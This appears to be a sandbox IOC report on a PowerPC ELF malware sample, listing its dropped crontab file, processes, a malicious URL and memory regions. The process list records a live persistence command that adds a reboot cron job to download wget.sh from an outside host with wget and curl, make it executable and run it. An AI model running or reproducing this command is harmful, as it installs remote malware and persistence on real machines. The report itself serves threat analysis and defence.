IOC Report
nshppc.elf

loading gif

Files

File Path
Type
Category
Malicious
nshppc.elf
ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
initial sample
malicious
/var/spool/cron/crontabs/tmp.5oUS4H
ASCII text
dropped
malicious

Processes

Path
Cmdline
Malicious
/tmp/nshppc.elf
/tmp/nshppc.elf
/tmp/nshppc.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/nshppc.elf
-
/tmp/nshppc.elf
-
/tmp/nshppc.elf
-
/tmp/nshppc.elf
-
/tmp/nshppc.elf
-
/usr/lib/systemd/systemd
-
/usr/lib/snapd/snap-failure
/usr/lib/snapd/snap-failure snapd
/usr/lib/snapd/snap-failure
-
/usr/bin/systemctl
systemctl stop snapd.socket
/usr/lib/snapd/snap-failure
-
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown

Memdumps

Base Address
Regiontype
Protect
Malicious
7f1240024000
page read and write
7f124002a000
page read and write
558c7f2f6000
page read and write
7f133727c000
page read and write
7f133727c000
page read and write
7f1336b4a000
page read and write
7f1330021000
page read and write
7f13373a5000
page read and write
7ffda4422000
page read and write
7ffda4528000
page execute read
7f13373ad000
page read and write
7f1330000000
page read and write
558c7f06b000
page execute read
558c8130a000
page read and write
558c7f2f6000
page read and write
7f13368bb000
page read and write
558c812f4000
page execute and read and write
7f1330000000
page read and write
7f1240014000
page execute read
558c7f2ee000
page read and write
7f13373f2000
page read and write
7ffda4528000
page execute read
7f1330021000
page read and write
7f1240024000
page read and write
7f13373f2000
page read and write
7f13373a5000
page read and write
7f13373ad000
page read and write
7f13368ad000
page read and write
558c8130a000
page read and write
7f1336b4a000
page read and write
7f124002a000
page read and write
558c82a6b000
page read and write
7f1336f31000
page read and write
558c82a6b000
page read and write
558c7f2ee000
page read and write
7f13368bb000
page read and write
7f1336f0c000
page read and write
7f13360aa000
page read and write
7f1240014000
page execute read
7f13360aa000
page read and write
7f13368ad000
page read and write
558c812f4000
page execute and read and write
7ffda4422000
page read and write
7f1336f0c000
page read and write
7f1336f31000
page read and write
558c7f06b000
page execute read
There are 36 hidden memdumps, click here to show them.